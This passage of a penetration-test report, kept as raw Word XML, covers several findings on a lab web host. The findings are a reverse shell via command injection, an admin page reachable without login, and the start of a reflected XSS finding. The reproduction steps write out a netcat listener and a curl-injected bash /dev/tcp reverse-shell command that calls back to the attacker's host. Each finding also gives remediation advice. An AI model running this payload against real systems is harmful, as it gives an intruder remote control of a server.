        <w:t>F-04 — Reverse Shell / Initial Access (Exploitation Impact of F-03)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B08E78" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Severity: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="374151"/>
        </w:rPr>
        <w:t>CRITICAL (IMPACT OF F-03)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="6B7280"/>
        </w:rPr>
        <w:t xml:space="preserve">      CWE: CWE-78 (associated exploitation impact)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50567386" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Affected Asset: </w:t>
      </w:r>
      <w:r>
        <w:t>Host: 192.168.</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>76.157 — shell</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> obtained as www-data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F9AC508" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="220" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F858639" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Using the confirmed OS command injection in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>feedback.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (F-03), an interactive reverse shell was established from the target host (192.168.76.157) back to the attacker's Kali host (192.168.76.128) on port 4444. This is documented as exploitation impact / attack-path evidence associated with F-03, not as an independent vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="107AE2AC" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="220" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
        </w:rPr>
        <w:t>Technical Details</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5556892B" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A reverse-shell one-liner was submitted via the path parameter, causing the target to initiate an outbound connection to a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> listener on the attacker host.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73D928A9" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The resulting shell confirmed: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=33(www-data) gid=33(www-data) groups=33(www-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>data);</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> hostname </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>debian</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>; and OS details from /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>os</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-release: Debian GNU/Linux 10 (buster).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF9C6C4" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">From this shell, further local enumeration was performed (process list, home directory contents, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cron</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> configuration, and file permissions) as documented in Section 7 (Post-Exploitation Findings).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="454B3248" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="220" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
        </w:rPr>
        <w:t>Reproduction Steps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D4CF57" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Start a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> listener on the attacker host: nc -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lvnp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F233EFB" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Trigger the reverse shell payload via the vulnerable path parameter: curl -G --data-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>urlencode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> "path=bash -c 'bash -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> &gt;&amp; /dev/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/192.168.76.128/4444 0&gt;&amp;1'" http://192.168.76.157/root/images/os/feedback.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7633FF1E" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Confirm the interactive session and current privilege level (id, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -a).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43CF1D3B" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="220" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
        </w:rPr>
        <w:t>Evidence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA139AB" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>The figure below shows the established reverse shell (left) with confirmed www-data identity, hostname, and OS version, alongside the exact exploitation request used (right).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="732E6222" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="4" w:color="D1D5DB"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="D1D5DB"/>
          <w:bottom w:val="single" w:sz="4" w:space="4" w:color="D1D5DB"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="D1D5DB"/>
        </w:pBdr>
        <w:spacing w:before="120" w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="57A66CD9" wp14:editId="26AAA4A3">
            <wp:extent cx="5905500" cy="3295650"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="987199098" name="Picture 987199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295650"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5577ACDC" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="220"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="6B7280"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Figure 4. Interactive reverse shell obtained as www-data on the Book-Shelf host (Debian 10 "buster"), shown with the corresponding command-injection payload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B2F4D29" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="220" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
        </w:rPr>
        <w:t>Impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B0048D" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Provided a persistent, interactive foothold on the host for post-exploitation enumeration, beyond single blind command execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAB4301" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Enabled confirmation of the underlying operating system, running processes, and file-level detail that informed subsequent findings (F-02, F-07, and negative tests in Section 4 of the Appendix).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04365688" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="220" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
        </w:rPr>
        <w:t>Risk Explanation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A258BA" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This finding is not independently scored, as it is a direct consequence of F-03 (OS Command Injection). It is presented separately for clarity of the attack chain and to document the level of access </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>actually achieved</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>: www-data, not root or defender.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7632AFAF" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="220" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="118ABDCB" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Remediating F-03 (OS command injection) directly prevents this exploitation path.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="129FD9E8" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Apply egress filtering to limit outbound connections from application servers to only what is operationally necessary, which would reduce the impact of reverse-shell style payloads even if injection is not fully prevented.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="197765DC" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="320" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>F-05 — Unauthenticated Access to Admin/Profile Page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="148B74D4" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Severity: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="B91C1C"/>
        </w:rPr>
        <w:t>HIGH</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="6B7280"/>
        </w:rPr>
        <w:t xml:space="preserve">      CWE: CWE-306 (Missing Authentication for Critical Function) / CWE-284 (Improper Access Control)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="450D9C91" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Affected Asset: </w:t>
      </w:r>
      <w:r>
        <w:t>/root/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>log_in</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/admin/B00kYouRProFile.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="363C3F51" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="220" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4055DBB2" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>The application's profile page, intended to be reached only after a successful login, was found to return its full content (HTTP 200 OK) even when requested directly with no session or authentication cookies present. This indicates missing authentication / broken access control on this page.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38DA0A44" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="220" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
        </w:rPr>
        <w:t>Technical Details</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC89AF0" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>A request to the page was first made following a successful login (using the credentials from F-02), returning the expected profile content.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DECA08F" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>The same request was then repeated with no authentication cookies or session state. The page again returned HTTP 200 OK with the full profile HTML — including navigation to Products, Feedback, and other application areas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D870B5" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>No server-side session check, redirect, or access-denied response was observed for the unauthenticated request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F6892D0" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="220" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
        </w:rPr>
        <w:t>Reproduction Steps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D52535" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>In a fresh, unauthenticated context (e.g., curl with no cookie jar), request: curl -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> http://192.168.76.157/root/log_in/admin/B00kYouRProFile.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21012E9C" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Observe the HTTP 200 OK response and </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>full page</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> content returned without any prior login.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4565CDAB" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="220" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
        </w:rPr>
        <w:t>Evidence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D8FFF65" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>The figure below shows the unauthenticated request to the profile page returning a full HTTP 200 OK response with page content.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4845C392" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="4" w:color="D1D5DB"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="D1D5DB"/>
          <w:bottom w:val="single" w:sz="4" w:space="4" w:color="D1D5DB"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="D1D5DB"/>
        </w:pBdr>
        <w:spacing w:before="120" w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7B7AD8F4" wp14:editId="32E1FD61">
            <wp:extent cx="5905500" cy="2981325"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1129282749" name="Picture 1129282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981325"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="376C97E0" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="220"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="6B7280"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Figure 5. Unauthenticated HTTP request to B00kYouRProFile.php returning HTTP 200 OK with full profile page content.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C0B2C10" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="220" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A64ACA" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Any unauthenticated user on the network can directly reach a page intended to require </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>a prior</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> login, exposing application functionality and profile-related content without credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D8FED38" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>This finding does not, on the evidence gathered, demonstrate exposure of another user's private data or administrative takeover — the impact is scoped to unauthorized reachability of the page and its visible functionality.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="658C3BE8" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="220" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
        </w:rPr>
        <w:t>Risk Explanation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE326D2" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Rated High given that authentication is completely bypassed for this page with no additional effort required; it is not rated Critical because the specific data/functionality confirmed reachable on this page does not, by itself, provide further system compromise beyond what F-02/F-03 already provide.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58552393" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="220" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55429DB6" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Enforce server-side session/authentication checks on every request to protected pages, not only at the point of initial login.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A92AC0" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Adopt a centralized authentication/authorization middleware or framework rather than page-by-page logic, to reduce the risk of missed checks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FDA0D93" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Apply the principle of default-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>deny:</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> protected resources should reject unauthenticated requests unless explicitly permitted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B4783C3" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="320" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>F-06 — Reflected Cross-Site Scripting (XSS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6196B4FE" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Severity: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="B45309"/>
        </w:rPr>
        <w:t>MEDIUM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="6B7280"/>
        </w:rPr>
        <w:t xml:space="preserve">      CWE: CWE-79 (Improper Neutralization of Input During Web Page Generation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DAA565A" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Affected Asset: </w:t>
      </w:r>
      <w:r>
        <w:t>/root/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>log_in</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/admin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
